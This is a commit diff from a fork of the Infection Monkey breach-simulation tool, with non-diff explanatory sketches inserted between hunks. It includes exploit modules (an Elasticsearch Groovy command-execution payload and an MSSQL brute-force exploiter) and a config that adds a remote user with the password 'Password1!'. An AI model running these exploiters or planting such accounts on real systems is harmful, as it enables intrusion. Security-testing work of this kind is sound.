forked from p15670423/monkey
Merge branch 'develop' into MonkeyZoo
This commit is contained in:
commit 313b1532b1
@@ -69,6 +69,9 @@ bin
 /monkey/monkey_island/cc/server.csr
 /monkey/monkey_island/cc/ui/node_modules/
 
+# User files
+/monkey/monkey_island/cc/userUploads
+
 # MonkeyZoo
 # Network status files
 MonkeyZoo/*
@@ -78,3 +81,5 @@ MonkeyZoo/*
 !MonkeyZoo/README.MD
 !MonkeyZoo/config.tf
 !MonkeyZoo/MonkeyZooDocs.pdf
+
+
@@ -41,6 +41,8 @@ Setup
 -------------------------------
 Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
 
+The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
+
 
 Building the Monkey from source
 -------------------------------
@@ -121,7 +121,7 @@ openssl req -new -key cc/server.key -out cc/server.csr \
 openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
 
 
-chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
+sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
 ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
 
 # Install npm
@@ -142,16 +142,16 @@ npm run dist
 log_message "Installing monkey requirements"
 sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
 cd ${monkey_home}/monkey/infection_monkey || handle_error
-python -m pip install --user -r requirements.txt || handle_error
+python -m pip install --user -r requirements_linux.txt || handle_error
 
 # Build samba
 log_message "Building samba binaries"
 sudo apt-get install gcc-multilib
 cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
-chmod +x ./build.sh || handle_error
+sudo chmod +x ./build.sh || handle_error
 ./build.sh
 
-chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
+sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
 
 log_message "Deployment script finished."
 exit 0
@@ -39,7 +39,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
         New-Item -ItemType directory -path $binDir
         "Bin directory added"
     }
 
     # We check if python is installed
     try
     {
@@ -72,7 +72,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
         "Downloading Visual C++ Compiler for Python 2.7 ..."
         $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
         Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
         $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
         Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
 
     # Install requirements for island
@@ -86,7 +86,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
     }
     & python -m pip install --user -r $islandRequirements
     # Install requirements for monkey
-    $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements.txt"
+    $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
     & python -m pip install --user -r $monkeyRequirements
 
     # Download mongodb
@@ -0,0 +1 @@
+*.md
@@ -1,19 +1,24 @@
-FROM debian:jessie-slim
+FROM debian:stretch-slim
 
 LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
 
+ARG RELEASE=1.6
+ARG DEBIAN_FRONTEND=noninteractive
+
+EXPOSE 5000
 
 WORKDIR /app
 
-ADD https://github.com/guardicore/monkey/releases/download/1.5.2/infection_monkey_1.5.2_deb.tgz .
+ADD https://github.com/guardicore/monkey/releases/download/${RELEASE}/infection_monkey_deb.${RELEASE}.tgz .
 
-RUN tar xvf infection_monkey_1.5.2_deb.tgz \
+RUN tar xvf infection_monkey_deb.${RELEASE}.tgz \
 && apt-get -yqq update \
 && apt-get -yqq upgrade \
 && apt-get -yqq install python-pip \
-   libssl-dev \
-   supervisor \
-&& dpkg -i *.deb
+   python-dev \
+&& dpkg -i *.deb \
+&& rm -f *.deb *.tgz
 
-COPY stack.conf /etc/supervisor/conf.d/stack.conf
+WORKDIR /var/monkey
+ENTRYPOINT ["/var/monkey/monkey_island/bin/python/bin/python"]
-ENTRYPOINT [ "supervisord", "-n", "-c", "/etc/supervisor/supervisord.conf" ]
+CMD ["/var/monkey/monkey_island.py"]
@@ -0,0 +1,22 @@
+version: '3.3'
+
+services:
+  db:
+    image: mongo:4
+    restart: always
+    volumes:
+      - db_data:/data/db
+    environment:
+      MONGO_INITDB_DATABASE: monkeyisland
+  monkey:
+    depends_on:
+      - db
+    build: .
+    image: monkey:latest
+    ports:
+      - "5000:5000"
+    environment:
+      MONGO_URL: mongodb://db:27017/monkeyisland
+
+volumes:
+  db_data:
@@ -1,4 +0,0 @@
-[program:mongod]
-command=/var/monkey_island/bin/mongodb/bin/mongod --quiet --dbpath /var/monkey_island/db
-[program:monkey]
-command=/var/monkey_island/ubuntu/systemd/start_server.sh
@@ -1,17 +0,0 @@
-import urllib2
-
-__author__ = 'itay.mizeretz'
-
-
-class AWS(object):
-    def __init__(self):
-        try:
-            self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id').read()
-        except urllib2.URLError:
-            self.instance_id = None
-
-    def get_instance_id(self):
-        return self.instance_id
-
-    def is_aws_instance(self):
-        return self.instance_id is not None
@@ -0,0 +1,35 @@
+import re
+import urllib2
+
+__author__ = 'itay.mizeretz'
+
+
+class AwsInstance(object):
+    def __init__(self):
+        try:
+            self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id', timeout=2).read()
+            self.region = self._parse_region(
+                urllib2.urlopen('http://169.254.169.254/latest/meta-data/placement/availability-zone').read())
+        except urllib2.URLError:
+            self.instance_id = None
+            self.region = None
+
+    @staticmethod
+    def _parse_region(region_url_response):
+        # For a list of regions: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
+        # This regex will find any AWS region format string in the response.
+        re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
+        finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
+        if finding:
+            return finding[0]
+        else:
+            return None
+
+    def get_instance_id(self):
+        return self.instance_id
+
+    def get_region(self):
+        return self.region
+
+    def is_aws_instance(self):
+        return self.instance_id is not None
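A note on the region parsing introduced in the new AwsInstance class above: the regular expression simply pulls the region prefix out of the availability-zone metadata string. A minimal standalone sketch of that behaviour (the sample availability-zone values are illustrative, not taken from the commit):

import re

RE_PHRASE = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'

def parse_region(az_response):
    # 'us-east-1b' -> 'us-east-1'; None when nothing in the response looks like a region
    finding = re.findall(RE_PHRASE, az_response, re.IGNORECASE)
    return finding[0] if finding else None

print(parse_region('us-east-1b'))    # us-east-1
print(parse_region('not-a-zone'))    # None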
@@ -0,0 +1,63 @@
+import boto3
+from botocore.exceptions import ClientError
+
+__author__ = 'itay.mizeretz'
+
+
+class AwsService(object):
+    """
+    Supplies various AWS services
+    """
+
+    access_key_id = None
+    secret_access_key = None
+    region = None
+
+    @staticmethod
+    def set_auth_params(access_key_id, secret_access_key):
+        AwsService.access_key_id = access_key_id
+        AwsService.secret_access_key = secret_access_key
+
+    @staticmethod
+    def set_region(region):
+        AwsService.region = region
+
+    @staticmethod
+    def get_client(client_type, region=None):
+        return boto3.client(
+            client_type,
+            aws_access_key_id=AwsService.access_key_id,
+            aws_secret_access_key=AwsService.secret_access_key,
+            region_name=region if region is not None else AwsService.region)
+
+    @staticmethod
+    def get_session():
+        return boto3.session.Session(
+            aws_access_key_id=AwsService.access_key_id,
+            aws_secret_access_key=AwsService.secret_access_key)
+
+    @staticmethod
+    def get_regions():
+        return AwsService.get_session().get_available_regions('ssm')
+
+    @staticmethod
+    def test_client():
+        try:
+            AwsService.get_client('ssm').describe_instance_information()
+            return True
+        except ClientError:
+            return False
+
+    @staticmethod
+    def get_instances():
+        return \
+            [
+                {
+                    'instance_id': x['InstanceId'],
+                    'name': x['ComputerName'],
+                    'os': x['PlatformType'].lower(),
+                    'ip_address': x['IPAddress']
+                }
+                for x in AwsService.get_client('ssm').describe_instance_information()['InstanceInformationList']
+            ]
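For orientation, a hedged usage sketch of the AwsService helper added above, assuming IAM credentials for an account with SSM-managed instances (the credential strings below are placeholders):

from common.cloud.aws_service import AwsService

AwsService.set_auth_params('AKIA...placeholder...', 'secret...placeholder...')
AwsService.set_region('us-east-1')
if AwsService.test_client():
    # Each entry looks like {'instance_id': ..., 'name': ..., 'os': ..., 'ip_address': ...}
    for instance in AwsService.get_instances():
        print(instance['instance_id'], instance['os'], instance['ip_address'])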
@@ -0,0 +1,26 @@
+from common.cmd.cmd_result import CmdResult
+
+
+__author__ = 'itay.mizeretz'
+
+
+class AwsCmdResult(CmdResult):
+    """
+    Class representing an AWS command result
+    """
+
+    def __init__(self, command_info):
+        super(AwsCmdResult, self).__init__(
+            self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'],
+            command_info[u'StandardErrorContent'])
+        self.command_info = command_info
+
+    @staticmethod
+    def is_successful(command_info, is_timeout=False):
+        """
+        Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
+        :param command_info: Command info struct (returned by ssm.get_command_invocation)
+        :param is_timeout: Whether the given command timed out
+        :return: True if successful, False otherwise.
+        """
+        return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress'))
@@ -0,0 +1,42 @@
+import logging
+
+from common.cloud.aws_service import AwsService
+from common.cmd.aws.aws_cmd_result import AwsCmdResult
+from common.cmd.cmd_runner import CmdRunner
+from common.cmd.cmd_status import CmdStatus
+
+__author__ = 'itay.mizeretz'
+
+logger = logging.getLogger(__name__)
+
+
+class AwsCmdRunner(CmdRunner):
+    """
+    Class for running commands on a remote AWS machine
+    """
+
+    def __init__(self, is_linux, instance_id, region = None):
+        super(AwsCmdRunner, self).__init__(is_linux)
+        self.instance_id = instance_id
+        self.region = region
+        self.ssm = AwsService.get_client('ssm', region)
+
+    def query_command(self, command_id):
+        return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
+
+    def get_command_result(self, command_info):
+        return AwsCmdResult(command_info)
+
+    def get_command_status(self, command_info):
+        if command_info[u'Status'] == u'InProgress':
+            return CmdStatus.IN_PROGRESS
+        elif command_info[u'Status'] == u'Success':
+            return CmdStatus.SUCCESS
+        else:
+            return CmdStatus.FAILURE
+
+    def run_command_async(self, command_line):
+        doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
+        command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
+                                            InstanceIds=[self.instance_id])
+        return command_res['Command']['CommandId']
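Putting the SSM pieces together, a sketch of running a single shell command on a managed instance through the runner above (the instance ID and region are placeholders, and AwsService is assumed to have been given credentials as in the earlier sketch):

from common.cmd.cmd import Cmd
from common.cmd.cmd_runner import CmdRunner
from common.cmd.aws.aws_cmd_runner import AwsCmdRunner

runner = AwsCmdRunner(is_linux=True, instance_id='i-0123456789abcdef0', region='us-east-1')
cmd_id = runner.run_command_async('uname -a')
# wait_commands polls get_command_status until the command finishes or the timeout expires
for command, result in CmdRunner.wait_commands([Cmd(runner, cmd_id)], timeout=30):
    print(result.is_success, result.stdout)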
@@ -0,0 +1,11 @@
+__author__ = 'itay.mizeretz'
+
+
+class Cmd(object):
+    """
+    Class representing a command
+    """
+
+    def __init__(self, cmd_runner, cmd_id):
+        self.cmd_runner = cmd_runner
+        self.cmd_id = cmd_id
@@ -0,0 +1,13 @@
+__author__ = 'itay.mizeretz'
+
+
+class CmdResult(object):
+    """
+    Class representing a command result
+    """
+
+    def __init__(self, is_success, status_code=None, stdout=None, stderr=None):
+        self.is_success = is_success
+        self.status_code = status_code
+        self.stdout = stdout
+        self.stderr = stderr
@@ -0,0 +1,158 @@
+import time
+import logging
+from abc import abstractmethod
+
+from common.cmd.cmd import Cmd
+from common.cmd.cmd_result import CmdResult
+from common.cmd.cmd_status import CmdStatus
+
+__author__ = 'itay.mizeretz'
+
+logger = logging.getLogger(__name__)
+
+
+class CmdRunner(object):
+    """
+    Interface for running commands on a remote machine
+
+    Since these classes are a bit complex, I provide a list of common terminology and formats:
+    * command line - a command line. e.g. 'echo hello'
+    * command - represent a single command which was already run. Always of type Cmd
+    * command id - any unique identifier of a command which was already run
+    * command result - represents the result of running a command. Always of type CmdResult
+    * command status - represents the current status of a command. Always of type CmdStatus
+    * command info - Any consistent structure representing additional information of a command which was already run
+    * instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
+    * instance_id - any unique identifier of an instance (machine). Can be of any format
+    """
+
+    # Default command timeout in seconds
+    DEFAULT_TIMEOUT = 5
+    # Time to sleep when waiting on commands.
+    WAIT_SLEEP_TIME = 1
+
+    def __init__(self, is_linux):
+        self.is_linux = is_linux
+
+    def run_command(self, command_line, timeout=DEFAULT_TIMEOUT):
+        """
+        Runs the given command on the remote machine
+        :param command_line: The command line to run
+        :param timeout: Timeout in seconds for command.
+        :return: Command result
+        """
+        c_id = self.run_command_async(command_line)
+        return self.wait_commands([Cmd(self, c_id)], timeout)[1]
+
+    @staticmethod
+    def run_multiple_commands(instances, inst_to_cmd, inst_n_cmd_res_to_res):
+        """
+        Run multiple commands on various instances
+        :param instances: List of instances.
+        :param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
+        :param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
+        and returns a parsed result (of any format)
+        :return: Dictionary with 'instance_id' as key and parsed result as value
+        """
+        command_instance_dict = {}
+
+        for instance in instances:
+            command = inst_to_cmd(instance)
+            command_instance_dict[command] = instance
+
+        instance_results = {}
+        command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys())
+        for command, result in command_result_pairs:
+            instance = command_instance_dict[command]
+            instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
+
+        return instance_results
+
+    @abstractmethod
+    def run_command_async(self, command_line):
+        """
+        Runs the given command on the remote machine asynchronously.
+        :param command_line: The command line to run
+        :return: Command ID (in any format)
+        """
+        raise NotImplementedError()
+
+    @staticmethod
+    def wait_commands(commands, timeout=DEFAULT_TIMEOUT):
+        """
+        Waits on all commands up to given timeout
+        :param commands: list of commands (of type Cmd)
+        :param timeout: Timeout in seconds for command.
+        :return: commands and their results (tuple of Command and CmdResult)
+        """
+        init_time = time.time()
+        curr_time = init_time
+
+        results = []
+
+        while (curr_time - init_time < timeout) and (len(commands) != 0):
+            for command in list(commands):  # list(commands) clones the list. We do so because we remove items inside
+                CmdRunner._process_command(command, commands, results, True)
+
+            time.sleep(CmdRunner.WAIT_SLEEP_TIME)
+            curr_time = time.time()
+
+        for command in list(commands):
+            CmdRunner._process_command(command, commands, results, False)
+
+        for command, result in results:
+            if not result.is_success:
+                logger.error('The following command failed: `%s`. status code: %s',
+                             str(command[1]), str(result.status_code))
+
+        return results
+
+    @abstractmethod
+    def query_command(self, command_id):
+        """
+        Queries the already run command for more info
+        :param command_id: The command ID to query
+        :return: Command info (in any format)
+        """
+        raise NotImplementedError()
+
+    @abstractmethod
+    def get_command_result(self, command_info):
+        """
+        Gets the result of the already run command
+        :param command_info: The command info of the command to get the result of
+        :return: CmdResult
+        """
+        raise NotImplementedError()
+
+    @abstractmethod
+    def get_command_status(self, command_info):
+        """
+        Gets the status of the already run command
+        :param command_info: The command info of the command to get the result of
+        :return: CmdStatus
+        """
+        raise NotImplementedError()
+
+    @staticmethod
+    def _process_command(command, commands, results, should_process_only_finished):
+        """
+        Removes the command from the list, processes its result and appends to results
+        :param command: Command to process. Must be in commands.
+        :param commands: List of unprocessed commands.
+        :param results: List of command results.
+        :param should_process_only_finished: If True, processes only if command finished.
+        :return: None
+        """
+        c_runner = command.cmd_runner
+        c_id = command.cmd_id
+        try:
+            command_info = c_runner.query_command(c_id)
+            if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
+                commands.remove(command)
+                results.append((command, c_runner.get_command_result(command_info)))
+        except Exception:
+            logger.exception('Exception while querying command: `%s`', str(c_id))
+            if not should_process_only_finished:
+                commands.remove(command)
+                results.append((command, CmdResult(False)))
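To make the interface above concrete, here is a minimal illustrative subclass that runs commands on the local machine with subprocess; it is not part of the commit, and the LocalCmdRunner name is hypothetical:

import subprocess

from common.cmd.cmd import Cmd
from common.cmd.cmd_result import CmdResult
from common.cmd.cmd_runner import CmdRunner
from common.cmd.cmd_status import CmdStatus


class LocalCmdRunner(CmdRunner):
    def run_command_async(self, command_line):
        # The Popen object serves as both the command id and the command info
        return subprocess.Popen(command_line, shell=True,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    def query_command(self, command_id):
        return command_id

    def get_command_status(self, command_info):
        if command_info.poll() is None:
            return CmdStatus.IN_PROGRESS
        return CmdStatus.SUCCESS if command_info.returncode == 0 else CmdStatus.FAILURE

    def get_command_result(self, command_info):
        stdout, stderr = command_info.communicate()
        return CmdResult(command_info.returncode == 0, command_info.returncode, stdout, stderr)


runner = LocalCmdRunner(is_linux=True)
cmd = Cmd(runner, runner.run_command_async('echo hello'))
for command, result in CmdRunner.wait_commands([cmd]):
    print(result.status_code, result.stdout)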
@@ -0,0 +1,9 @@
+from enum import Enum
+
+__author__ = 'itay.mizeretz'
+
+
+class CmdStatus(Enum):
+    IN_PROGRESS = 0
+    SUCCESS = 1
+    FAILURE = 2
@@ -5,9 +5,12 @@ from abc import ABCMeta, abstractmethod
 
 import ipaddress
 from six import text_type
+import logging
 
 __author__ = 'itamar'
 
+LOG = logging.getLogger(__name__)
+
 
 class NetworkRange(object):
     __metaclass__ = ABCMeta
@@ -47,12 +50,23 @@ class NetworkRange(object):
         address_str = address_str.strip()
         if not address_str:  # Empty string
             return None
-        if -1 != address_str.find('-'):
+        if NetworkRange.check_if_range(address_str):
             return IpRange(ip_range=address_str)
         if -1 != address_str.find('/'):
             return CidrRange(cidr_range=address_str)
         return SingleIpRange(ip_address=address_str)
 
+    @staticmethod
+    def check_if_range(address_str):
+        if -1 != address_str.find('-'):
+            ips = address_str.split('-')
+            try:
+                ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
+            except ValueError as e:
+                return False
+            return True
+        return False
+
     @staticmethod
     def _ip_to_number(address):
         return struct.unpack(">L", socket.inet_aton(address))[0]
@@ -111,13 +125,58 @@ class IpRange(NetworkRange):
 class SingleIpRange(NetworkRange):
     def __init__(self, ip_address, shuffle=True):
         super(SingleIpRange, self).__init__(shuffle=shuffle)
-        self._ip_address = ip_address
+        self._ip_address, self.domain_name = self.string_to_host(ip_address)
 
     def __repr__(self):
         return "<SingleIpRange %s>" % (self._ip_address,)
 
+    def __iter__(self):
+        """
+        We have to check if we have an IP to return, because user could have entered invalid
+        domain name and no IP was found
+        :return: IP if there is one
+        """
+        if self.ip_found():
+            yield self._number_to_ip(self.get_range()[0])
+
     def is_in_range(self, ip_address):
         return self._ip_address == ip_address
 
     def _get_range(self):
         return [SingleIpRange._ip_to_number(self._ip_address)]
 
+    def ip_found(self):
+        """
+        Checks if we could translate domain name entered into IP address
+        :return: True if dns found domain name and false otherwise
+        """
+        return self._ip_address
+
+    @staticmethod
+    def string_to_host(string):
+        """
+        Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
+        :param string: String that was entered in "Scan IP/subnet list"
+        :return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
+        """
+        # The most common use case is to enter ip/range into "Scan IP/subnet list"
+        domain_name = ''
+
+        # Make sure to have unicode string
+        user_input = string.decode('utf-8', 'ignore')
+
+        # Try casting user's input as IP
+        try:
+            ip = ipaddress.ip_address(user_input).exploded
+        except ValueError:
+            # Exception means that it's a domain name
+            try:
+                ip = socket.gethostbyname(string)
+                domain_name = string
+            except socket.error:
+                LOG.error("Your specified host: {} is not found as a domain name and"
+                          " it's not an IP address".format(string))
+                return None, string
+        # If a string was entered instead of IP we presume that it was domain name and translate it
+        return ip, domain_name
+
+
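For orientation, the intended behaviour of the helpers added to NetworkRange and SingleIpRange above, in Python 2 (the addresses and hostname are illustrative, and the import path is assumed from the infection_monkey package layout used elsewhere in this commit):

from infection_monkey.network.network_range import NetworkRange, SingleIpRange

NetworkRange.check_if_range(u'10.0.0.1-10.0.0.9')    # True: both endpoints parse as IP addresses
NetworkRange.check_if_range(u'10.0.0.0/24')          # False: no '-', handled as a CIDR range instead
SingleIpRange.string_to_host(u'192.168.55.1')        # ('192.168.55.1', '') - already an IP
SingleIpRange.string_to_host(u'localhost')           # (resolved IP, 'localhost') - resolved via DNS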
@@ -0,0 +1,10 @@
+from enum import Enum
+
+
+class ScanStatus(Enum):
+    # Technique wasn't scanned
+    UNSCANNED = 0
+    # Technique was attempted/scanned
+    SCANNED = 1
+    # Technique was attempted and succeeded
+    USED = 2
@@ -0,0 +1,7 @@
+from enum import Enum
+
+
+class ExploitType(Enum):
+    VULNERABILITY = 1
+    OTHER = 8
+    BRUTE_FORCE = 9
@@ -1,2 +1,2 @@
 #!/bin/bash
-pyinstaller --clean monkey-linux.spec
+pyinstaller -F --log-level=DEBUG --clean monkey.spec
@@ -7,8 +7,6 @@ from abc import ABCMeta
 from itertools import product
 import importlib
 
-importlib.import_module('infection_monkey', 'network')
-
 __author__ = 'itamar'
 
 GUID = str(uuid.getnode())
@@ -22,6 +20,7 @@ class Configuration(object):
         # now we won't work at <2.7 for sure
         network_import = importlib.import_module('infection_monkey.network')
         exploit_import = importlib.import_module('infection_monkey.exploit')
+        post_breach_import = importlib.import_module('infection_monkey.post_breach')
 
         unknown_items = []
         for key, value in formatted_data.items():
@@ -35,12 +34,12 @@ class Configuration(object):
             if key == 'finger_classes':
                 class_objects = [getattr(network_import, val) for val in value]
                 setattr(self, key, class_objects)
-            elif key == 'scanner_class':
-                scanner_object = getattr(network_import, value)
-                setattr(self, key, scanner_object)
             elif key == 'exploiter_classes':
                 class_objects = [getattr(exploit_import, val) for val in value]
                 setattr(self, key, class_objects)
+            elif key == 'post_breach_actions':
+                class_objects = [getattr(post_breach_import, val) for val in value]
+                setattr(self, key, class_objects)
             else:
                 if hasattr(self, key):
                     setattr(self, key, value)
@@ -133,7 +132,6 @@ class Configuration(object):
     # how many scan iterations to perform on each run
     max_iterations = 1
 
-    scanner_class = None
     finger_classes = []
     exploiter_classes = []
 
@@ -163,6 +161,10 @@ class Configuration(object):
 
     keep_tunnel_open_time = 60
 
+    # Monkey files directories
+    monkey_dir_linux = '/tmp/monkey_dir'
+    monkey_dir_windows = r'C:\Windows\Temp\monkey_dir'
+
     ###########################
     # scanners config
     ###########################
@@ -193,7 +195,7 @@ class Configuration(object):
                         9200]
     tcp_target_ports.extend(HTTP_PORTS)
     tcp_scan_timeout = 3000  # 3000 Milliseconds
-    tcp_scan_interval = 200
+    tcp_scan_interval = 0
     tcp_scan_get_banner = True
 
     # Ping Scanner
@@ -206,8 +208,8 @@ class Configuration(object):
     skip_exploit_if_file_exist = False
 
     ms08_067_exploit_attempts = 5
-    ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
-    ms08_067_remote_user_pass = "Password1!"
+    user_to_add = "Monkey_IUSER_SUPPORT"
+    remote_user_pass = "Password1!"
 
     # rdp exploiter
     rdp_use_vbs_download = True
@@ -268,5 +270,11 @@ class Configuration(object):
 
     extract_azure_creds = True
 
+    post_breach_actions = []
+    custom_PBA_linux_cmd = ""
+    custom_PBA_windows_cmd = ""
+    PBA_linux_filename = None
+    PBA_windows_filename = None
+
 
 WormConfiguration = Configuration()
@@ -8,7 +8,7 @@
   ],
   "keep_tunnel_open_time": 60,
   "subnet_scan_list": [
 
   ],
   "inaccessible_subnets": [],
   "blocked_ips": [],
@@ -28,6 +28,9 @@
   "dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
   "dropper_target_path_linux": "/tmp/monkey",
 
+  monkey_dir_linux = '/tmp/monkey_dir',
+  monkey_dir_windows = r'C:\Windows\Temp\monkey_dir',
+
 
   "kill_file_path_linux": "/var/run/monkey.not",
   "kill_file_path_windows": "%windir%\\monkey.not",
@@ -57,14 +60,13 @@
   "monkey_log_path_linux": "/tmp/user-1563",
   "send_log_to_server": true,
   "ms08_067_exploit_attempts": 5,
-  "ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
-  "ms08_067_remote_user_pass": "Password1!",
+  "user_to_add": "Monkey_IUSER_SUPPORT",
+  "remote_user_pass": "Password1!",
   "ping_scan_timeout": 10000,
   "rdp_use_vbs_download": true,
   "smb_download_timeout": 300,
   "smb_service_name": "InfectionMonkey",
   "retry_failed_explotation": true,
-  "scanner_class": "TcpScanner",
   "self_delete_in_cleanup": true,
   "serialize_config": false,
   "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
@@ -79,7 +81,7 @@
   "sambacry_shares_not_to_check": ["IPC$", "print$"],
   "local_network_scan": false,
   "tcp_scan_get_banner": true,
-  "tcp_scan_interval": 200,
+  "tcp_scan_interval": 0,
   "tcp_scan_timeout": 10000,
   "tcp_target_ports": [
     22,
@@ -97,5 +99,10 @@
   "timeout_between_iterations": 10,
   "use_file_logging": true,
   "victims_max_exploit": 7,
-  "victims_max_find": 30
+  "victims_max_find": 30,
+  "post_breach_actions" : []
+  custom_PBA_linux_cmd = ""
+  custom_PBA_windows_cmd = ""
+  PBA_linux_filename = None
+  PBA_windows_filename = None
 }
@@ -1,5 +1,6 @@
 from abc import ABCMeta, abstractmethod
 import infection_monkey.config
+from common.utils.exploit_enum import ExploitType
 
 __author__ = 'itamar'
 
@@ -9,6 +10,9 @@ class HostExploiter(object):
 
     _TARGET_OS_TYPE = []
 
+    # Usual values are 'vulnerability' or 'brute_force'
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+
     def __init__(self, host):
         self._config = infection_monkey.config.WormConfiguration
         self._exploit_info = {}
|
@ -45,3 +49,4 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
|
||||||
from infection_monkey.exploit.struts2 import Struts2Exploiter
|
from infection_monkey.exploit.struts2 import Struts2Exploiter
|
||||||
from infection_monkey.exploit.weblogic import WebLogicExploiter
|
from infection_monkey.exploit.weblogic import WebLogicExploiter
|
||||||
from infection_monkey.exploit.hadoop import HadoopExploiter
|
from infection_monkey.exploit.hadoop import HadoopExploiter
|
||||||
|
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
|
||||||
|
|
|
@@ -8,7 +8,8 @@ import json
 import logging
 import requests
 from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
+from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
+    DOWNLOAD_TIMEOUT
 from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
 
 import re
@@ -34,7 +35,7 @@ class ElasticGroovyExploiter(WebRCE):
         exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
         exploit_config['dropper'] = True
         exploit_config['url_extensions'] = ['_search?pretty']
-        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
+        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX+" "+RDP_CMDLINE_HTTP}
         return exploit_config
 
     def get_open_service_ports(self, port_list, names):
@@ -47,7 +48,11 @@ class ElasticGroovyExploiter(WebRCE):
     def exploit(self, url, command):
         command = re.sub(r"\\", r"\\\\\\\\", command)
         payload = self.JAVA_CMD % command
-        response = requests.get(url, data=payload)
+        try:
+            response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
+        except requests.ReadTimeout:
+            LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
+            return False
         result = self.get_results(response)
         if not result:
             return False
@@ -63,3 +68,20 @@ class ElasticGroovyExploiter(WebRCE):
             return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
         except (KeyError, IndexError):
             return None
+
+    def check_if_exploitable(self, url):
+        # Overridden web_rce method that adds CMD prefix for windows command
+        try:
+            if 'windows' in self.host.os['type']:
+                resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
+            else:
+                resp = self.exploit(url, CHECK_COMMAND)
+            if resp is True:
+                return True
+            elif resp is not False and ID_STRING in resp:
+                return True
+            else:
+                return False
+        except Exception as e:
+            LOG.error("Host's exploitability check failed due to: %s" % e)
+            return False
@@ -36,6 +36,9 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
+        # We presume hadoop works only on 64-bit machines
+        if self.host.os['type'] == 'windows':
+            self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()
         if not paths:
             return False
@ -0,0 +1,130 @@
|
||||||
|
import os
|
||||||
|
import logging
|
||||||
|
|
||||||
|
import pymssql
|
||||||
|
|
||||||
|
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class MSSQLExploiter(HostExploiter):
|
||||||
|
|
||||||
|
_TARGET_OS_TYPE = ['windows']
|
||||||
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
|
LOGIN_TIMEOUT = 15
|
